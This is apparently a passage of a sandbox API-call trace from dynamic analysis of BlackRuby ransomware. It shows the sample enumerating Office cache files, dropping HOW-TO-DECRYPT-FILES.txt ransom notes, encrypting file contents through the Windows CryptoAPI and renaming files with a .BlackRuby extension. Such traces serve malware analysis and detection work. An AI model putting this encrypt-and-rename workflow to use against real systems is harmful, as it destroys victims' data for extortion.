GetLastError () returned 0x12 [0047.379] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0047.379] GetLastError () returned 0x12 [0047.379] FindNextFileW (in: hFindFile=0x360ee0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0047.379] GetLastError () returned 0x12 [0047.379] FindClose (in: hFindFile=0x360ee0 | out: hFindFile=0x360ee0) returned 1 [0047.380] SetErrorMode (uMode=0x0) returned 0x1 [0047.380] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\Office64WW.msi", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\Office64WW.msi", lpFilePart=0x0) returned 0x4d [0047.380] GetLastError () returned 0x12 [0047.380] SetErrorMode (uMode=0x1) returned 0x0 [0047.380] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\Office64WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-0000-0000000ff1ce}-c\\office64ww.msi"), fInfoLevelId=0x0, lpFileInformation=0x1b42810 | out: lpFileInformation=0x1b42810*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x337ced00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x337ced00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0x3e01f940, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x2e2a00)) returned 1 [0047.381] GetLastError () returned 0x12 [0047.381] SetErrorMode (uMode=0x0) returned 0x1 [0047.382] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0047.382] GetLastError () returned 0x12 [0047.382] SetErrorMode (uMode=0x1) returned 0x0 [0047.382] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0047.384] GetLastError () returned 0x0 [0047.384] GetFileType (hFile=0x184) returned 0x1 [0047.384] SetErrorMode (uMode=0x0) returned 0x1 [0047.384] GetFileType (hFile=0x184) returned 0x1 [0047.384] WriteFile (in: hFile=0x184, lpBuffer=0x1b5e45c*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ed98, lpOverlapped=0x0 | out: lpBuffer=0x1b5e45c*, lpNumberOfBytesWritten=0x18ed98*=0x18da, lpOverlapped=0x0) returned 1 [0047.385] GetLastError () returned 0x0 [0047.385] CloseHandle (hObject=0x184) returned 1 [0047.386] GetLastError () returned 0x0 [0047.386] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e960, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0047.386] GetLastError () returned 0x0 [0047.386] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0047.386] GetLastError () returned 0x0 [0047.386] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\Office64WW.xml", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\Office64WW.xml", lpFilePart=0x0) returned 0x4d [0047.386] GetLastError () returned 0x0 [0047.386] SetErrorMode (uMode=0x1) returned 0x0 [0047.386] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\Office64WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-0000-0000000ff1ce}-c\\office64ww.xml"), fInfoLevelId=0x0, lpFileInformation=0x1b60168 | out: lpFileInformation=0x1b60168*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x979fb100, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x979fb100, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0x3e01f940, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x124d)) returned 1 [0047.386] GetLastError () returned 0x0 [0047.386] SetErrorMode (uMode=0x0) returned 0x1 [0047.386] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\Office64WW.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\Office64WW.xml", lpFilePart=0x0) returned 0x4d [0047.386] GetLastError () returned 0x0 [0047.386] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\Office64WW.xml", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\Office64WW.xml", lpFilePart=0x0) returned 0x4d [0047.386] GetLastError () returned 0x0 [0047.386] SetErrorMode (uMode=0x1) returned 0x0 [0047.387] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\Office64WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-0000-0000000ff1ce}-c\\office64ww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0047.387] GetLastError () returned 0x0 [0047.387] GetFileType (hFile=0x184) returned 0x1 [0047.387] SetErrorMode (uMode=0x0) returned 0x1 [0047.387] GetFileType (hFile=0x184) returned 0x1 [0047.387] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x124d [0047.387] GetLastError () returned 0x0 [0047.387] ReadFile (in: hFile=0x184, lpBuffer=0x1b620b0, nNumberOfBytesToRead=0x124d, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1b620b0*, lpNumberOfBytesRead=0x18ed84*=0x124d, lpOverlapped=0x0) returned 1 [0047.393] GetLastError () returned 0x0 [0047.393] CloseHandle (hObject=0x184) returned 1 [0047.393] GetLastError () returned 0x0 [0047.393] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\Office64WW.xml", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\Office64WW.xml", lpFilePart=0x0) returned 0x4d [0047.393] GetLastError () returned 0x0 [0047.393] SetErrorMode (uMode=0x1) returned 0x0 [0047.393] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\Office64WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-0000-0000000ff1ce}-c\\office64ww.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x979fb100, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x979fb100, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0x3e01f940, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x124d)) returned 1 [0047.393] GetLastError () returned 0x0 [0047.393] SetErrorMode (uMode=0x0) returned 0x1 [0047.393] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c708) returned 1 [0047.394] GetLastError () returned 0x0 [0047.424] CryptImportKey (in: hProv=0x37c708, pbData=0x1bbe93c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360e20) returned 1 [0047.424] GetLastError () returned 0x0 [0047.424] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0047.424] GetLastError () returned 0x0 [0047.430] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0047.430] GetLastError () returned 0x0 [0047.430] CryptDuplicateKey (in: hKey=0x360e20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360b60) returned 1 [0047.430] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0047.430] GetLastError () returned 0x0 [0047.430] CryptSetKeyParam (hKey=0x360b60, dwParam=0x4, pbData=0x1beb988*=0x1, dwFlags=0x0) returned 1 [0047.430] GetLastError () returned 0x0 [0047.430] CryptSetKeyParam (hKey=0x360b60, dwParam=0x1, pbData=0x1beb954, dwFlags=0x0) returned 1 [0047.430] GetLastError () returned 0x0 [0047.430] CryptEncrypt (in: hKey=0x360b60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1beb9d0*, pdwDataLen=0x18ed74*=0x1340, dwBufLen=0x1340 | out: pbData=0x1beb9d0*, pdwDataLen=0x18ed74*=0x1340) returned 1 [0047.430] GetLastError () returned 0x0 [0047.430] CryptEncrypt (in: hKey=0x360b60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bee07c*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1bee07c*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0047.430] GetLastError () returned 0x0 [0047.430] CryptEncrypt (in: hKey=0x360b60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1bee0ac*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1bee0ac*, pdwDataLen=0x18ed94*=0x10) returned 1 [0047.430] GetLastError () returned 0x0 [0047.430] CryptDestroyKey (hKey=0x360e20) returned 1 [0047.430] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0047.430] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0047.430] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\Office64WW.xml", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\Office64WW.xml", lpFilePart=0x0) returned 0x4d [0047.430] GetLastError () returned 0x0 [0047.430] SetErrorMode (uMode=0x1) returned 0x0 [0047.430] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\Office64WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-0000-0000000ff1ce}-c\\office64ww.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0047.431] GetLastError () returned 0xb7 [0047.431] GetFileType (hFile=0x184) returned 0x1 [0047.431] SetErrorMode (uMode=0x0) returned 0x1 [0047.431] GetFileType (hFile=0x184) returned 0x1 [0047.433] CloseHandle (hObject=0x184) returned 1 [0047.433] GetLastError () returned 0xb7 [0047.433] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\Office64WW.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\Office64WW.xml", lpFilePart=0x0) returned 0x4d [0047.433] GetLastError () returned 0xb7 [0047.433] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\Encrypted_Ijz9KiMsW1VAJr9gA2ekWIqWZYvqIE82z7Pr472ch.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\Encrypted_Ijz9KiMsW1VAJr9gA2ekWIqWZYvqIE82z7Pr472ch.BlackRuby", lpFilePart=0x0) returned 0x7c [0047.433] GetLastError () returned 0xb7 [0047.433] SetErrorMode (uMode=0x1) returned 0x0 [0047.433] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\Office64WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-0000-0000000ff1ce}-c\\office64ww.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x979fb100, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x979fb100, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0x2479e6c0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x1350)) returned 1 [0047.433] GetLastError () returned 0xb7 [0047.433] SetErrorMode (uMode=0x0) returned 0x1 [0047.433] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\Office64WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-0000-0000000ff1ce}-c\\office64ww.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\Encrypted_Ijz9KiMsW1VAJr9gA2ekWIqWZYvqIE82z7Pr472ch.BlackRuby" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-0000-0000000ff1ce}-c\\encrypted_ijz9kimsw1vajr9ga2ekwiqwzyvqie82z7pr472ch.blackruby")) returned 1 [0047.433] GetLastError () returned 0xb7 [0047.434] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0047.434] GetLastError () returned 0xb7 [0047.434] SetErrorMode (uMode=0x1) returned 0x0 [0047.434] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0047.434] GetLastError () returned 0x5 [0047.434] SetErrorMode (uMode=0x0) returned 0x1 [0047.435] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\ose.exe", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\ose.exe", lpFilePart=0x0) returned 0x46 [0047.435] GetLastError () returned 0x5 [0047.435] SetErrorMode (uMode=0x1) returned 0x0 [0047.435] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-0000-0000000ff1ce}-c\\ose.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c0efb8 | out: lpFileInformation=0x1c0efb8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf885a000, ftCreationTime.dwHighDateTime=0x1cac4d7, ftLastAccessTime.dwLowDateTime=0xf885a000, ftLastAccessTime.dwHighDateTime=0x1cac4d7, ftLastWriteTime.dwLowDateTime=0x43ebcc50, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x24768)) returned 1 [0047.435] GetLastError () returned 0x5 [0047.435] SetErrorMode (uMode=0x0) returned 0x1 [0047.435] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0047.435] GetLastError () returned 0x5 [0047.435] SetErrorMode (uMode=0x1) returned 0x0 [0047.435] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0047.435] GetLastError () returned 0x5 [0047.436] SetErrorMode (uMode=0x0) returned 0x1 [0047.436] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\osetup.dll", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\osetup.dll", lpFilePart=0x0) returned 0x49 [0047.436] GetLastError () returned 0x5 [0047.436] SetErrorMode (uMode=0x1) returned 0x0 [0047.436] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-0000-0000000ff1ce}-c\\osetup.dll"), fInfoLevelId=0x0, lpFileInformation=0x1c2d108 | out: lpFileInformation=0x1c2d108*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb2d57a00, ftCreationTime.dwHighDateTime=0x1cac15b, ftLastAccessTime.dwLowDateTime=0xb2d57a00, ftLastAccessTime.dwHighDateTime=0x1cac15b, ftLastWriteTime.dwLowDateTime=0x434ec900, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x585768)) returned 1 [0047.446] GetLastError () returned 0x5 [0047.446] SetErrorMode (uMode=0x0) returned 0x1 [0047.446] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0047.446] GetLastError () returned 0x5 [0047.447] SetErrorMode (uMode=0x1) returned 0x0 [0047.447] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0047.447] GetLastError () returned 0x5 [0047.447] SetErrorMode (uMode=0x0) returned 0x1 [0047.448] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\OWOW64WW.cab", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\OWOW64WW.cab", lpFilePart=0x0) returned 0x4b [0047.448] GetLastError () returned 0x5 [0047.448] SetErrorMode (uMode=0x1) returned 0x0 [0047.448] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\OWOW64WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-0000-0000000ff1ce}-c\\owow64ww.cab"), fInfoLevelId=0x0, lpFileInformation=0x1c4b26c | out: lpFileInformation=0x1c4b26c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x19430f00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x19430f00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0x3e044330, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x16c2838)) returned 1 [0047.448] GetLastError () returned 0x5 [0047.448] SetErrorMode (uMode=0x0) returned 0x1 [0047.448] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0047.448] GetLastError () returned 0x5 [0047.448] SetErrorMode (uMode=0x1) returned 0x0 [0047.448] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0047.448] GetLastError () returned 0x5 [0047.449] SetErrorMode (uMode=0x0) returned 0x1 [0047.449] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\PidGenX.dll", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\PidGenX.dll", lpFilePart=0x0) returned 0x4a [0047.449] GetLastError () returned 0x5 [0047.449] SetErrorMode (uMode=0x1) returned 0x0 [0047.449] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-0000-0000000ff1ce}-c\\pidgenx.dll"), fInfoLevelId=0x0, lpFileInformation=0x1c692d0 | out: lpFileInformation=0x1c692d0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe06a9500, ftCreationTime.dwHighDateTime=0x1cac7e5, ftLastAccessTime.dwLowDateTime=0xe06a9500, ftLastAccessTime.dwHighDateTime=0x1cac7e5, ftLastWriteTime.dwLowDateTime=0x43ee3d50, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x130b10)) returned 1 [0047.450] GetLastError () returned 0x5 [0047.450] SetErrorMode (uMode=0x0) returned 0x1 [0047.450] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0047.450] GetLastError () returned 0x5 [0047.450] SetErrorMode (uMode=0x1) returned 0x0 [0047.450] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0047.450] GetLastError () returned 0x5 [0047.451] SetErrorMode (uMode=0x0) returned 0x1 [0047.451] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms", lpFilePart=0x0) returned 0x57 [0047.451] GetLastError () returned 0x5 [0047.451] SetErrorMode (uMode=0x1) returned 0x0 [0047.451] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-0000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), fInfoLevelId=0x0, lpFileInformation=0x1c8732c | out: lpFileInformation=0x1c8732c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe06a9500, ftCreationTime.dwHighDateTime=0x1cac7e5, ftLastAccessTime.dwLowDateTime=0xe06a9500, ftLastAccessTime.dwHighDateTime=0x1cac7e5, ftLastWriteTime.dwLowDateTime=0x43ebcc50, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0xaec3a)) returned 1 [0047.451] GetLastError () returned 0x5 [0047.451] SetErrorMode (uMode=0x0) returned 0x1 [0047.452] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0047.452] GetLastError () returned 0x5 [0047.452] SetErrorMode (uMode=0x1) returned 0x0 [0047.452] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0047.452] GetLastError () returned 0x5 [0047.452] SetErrorMode (uMode=0x0) returned 0x1 [0047.452] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\ProPlusrWW.msi", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\ProPlusrWW.msi", lpFilePart=0x0) returned 0x4d [0047.452] GetLastError () returned 0x5 [0047.453] SetErrorMode (uMode=0x1) returned 0x0 [0047.453] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-0000-0000000FF1CE}-C\\ProPlusrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-0000-0000000ff1ce}-c\\proplusrww.msi"), fInfoLevelId=0x0, lpFileInformation=0x1ca53e0 | out: lpFileInformation=0x1ca53e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbc5f4d00, ftCreationTime.dwHighDateTime=0x1cad04a, 